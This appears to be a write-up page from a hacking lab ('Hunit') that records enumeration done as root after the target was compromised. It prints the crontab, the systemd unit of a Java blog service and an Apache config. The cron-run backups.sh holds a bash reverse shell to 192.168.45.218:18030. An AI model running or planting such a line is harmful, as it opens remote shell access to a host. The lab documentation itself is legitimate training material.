InfoSec LAB

Hunit_Beyond

Created: 2 min read

Beyond

This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.

Crontab

[root@hunit ~]# crontab -l
crontab -l
*/3 * * * * /root/git-server/backups.sh
*/2 * * * * /root/pull.sh

/root/git-server/backups.sh

[root@hunit ~]# cat /root/git-server/backups.sh
#!/bin/bash
#
#
# # Placeholder
#
bash -c "bash -i >& /dev/tcp/192.168.45.218/18030 0>&1"

/root/pull.sh

[root@hunit ~]# cat /root/pull.sh
#!/bin/bash
cd /root/git-server
git pull

Web 8080

[root@hunit srv]# systemctl status gradleblog.service
 gradleblog.service - Gradle Blog
     Loaded: loaded (/etc/systemd/system/gradleblog.service; enabled; vendor preset: disabled)
     Active: active (running) since Fri 2024-08-02 20:52:40 UTC; 7 months 27 days ago
   Main PID: 454 (java)
      Tasks: 35 (limit: 4699)
     Memory: 323.9M
     CGroup: /system.slice/gradleblog.service
             └─454 /usr/bin/java -jar /home/dademola/blog.jar
 
 
 
[root@hunit srv]# cat /etc/systemd/system/gradleblog.service
[Unit]
Description=Gradle Blog
After=network-online.target
 
[Service]
Type=simple
PIDFile=/run/gradleblog.pid
ExecStart=/usr/bin/java -jar /home/dademola/blog.jar
User=dademola
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
 
[Install]
WantedBy=multi-user.target

/usr/bin/java -jar /home/dademola/blog.jar

Web 18030

[root@hunit srv]# cat /etc/httpd/conf/httpd.conf | grep -v '^[#/]'
 
ServerRoot "/etc/httpd"
 
 
Listen 18030
 
LoadModule mpm_event_module modules/mod_mpm_event.so
LoadModule authn_file_module modules/mod_authn_file.so
LoadModule authn_core_module modules/mod_authn_core.so
LoadModule authz_host_module modules/mod_authz_host.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule authz_core_module modules/mod_authz_core.so
LoadModule access_compat_module modules/mod_access_compat.so
LoadModule auth_basic_module modules/mod_auth_basic.so
LoadModule reqtimeout_module modules/mod_reqtimeout.so
LoadModule include_module modules/mod_include.so
LoadModule filter_module modules/mod_filter.so
LoadModule mime_module modules/mod_mime.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule env_module modules/mod_env.so
LoadModule headers_module modules/mod_headers.so
LoadModule setenvif_module modules/mod_setenvif.so
LoadModule version_module modules/mod_version.so
LoadModule slotmem_shm_module modules/mod_slotmem_shm.so
LoadModule unixd_module modules/mod_unixd.so
LoadModule status_module modules/mod_status.so
LoadModule autoindex_module modules/mod_autoindex.so
<IfModule !mpm_prefork_module>
	#LoadModule cgid_module modules/mod_cgid.so
</IfModule>
<IfModule mpm_prefork_module>
	#LoadModule cgi_module modules/mod_cgi.so
</IfModule>
LoadModule negotiation_module modules/mod_negotiation.so
LoadModule dir_module modules/mod_dir.so
LoadModule userdir_module modules/mod_userdir.so
LoadModule alias_module modules/mod_alias.so
 
<IfModule unixd_module>
User http
Group http
 
</IfModule>
 
 
ServerAdmin you@example.com
 
 
<Directory />
    AllowOverride none
    Require all denied
</Directory>
 
 
DocumentRoot "/srv/http"
<Directory "/srv/http">
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
 
<IfModule dir_module>
    DirectoryIndex index.html
</IfModule>
 
<Files ".ht*">
    Require all denied
</Files>
 
ErrorLog "/var/log/httpd/error_log"
LogLevel warn
 
<IfModule log_config_module>
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
    <IfModule logio_module>
      LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    </IfModule>
    CustomLog "/var/log/httpd/access_log" common
</IfModule>
 
<IfModule alias_module>
    ScriptAlias /cgi-bin/ "/srv/http/cgi-bin/"
</IfModule>
 
<IfModule cgid_module>
</IfModule>
 
<Directory "/srv/http/cgi-bin">
    AllowOverride None
    Options None
    Require all granted
</Directory>
 
<IfModule headers_module>
    RequestHeader unset Proxy early
</IfModule>
 
<IfModule mime_module>
    TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
</IfModule>
 
Include conf/extra/httpd-multilang-errordoc.conf
Include conf/extra/httpd-autoindex.conf
Include conf/extra/httpd-languages.conf
Include conf/extra/httpd-userdir.conf
Include conf/extra/httpd-default.conf
 
<IfModule proxy_html_module>
Include conf/extra/proxy-html.conf
</IfModule>
 
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>

Interactive Graph View

Backlinks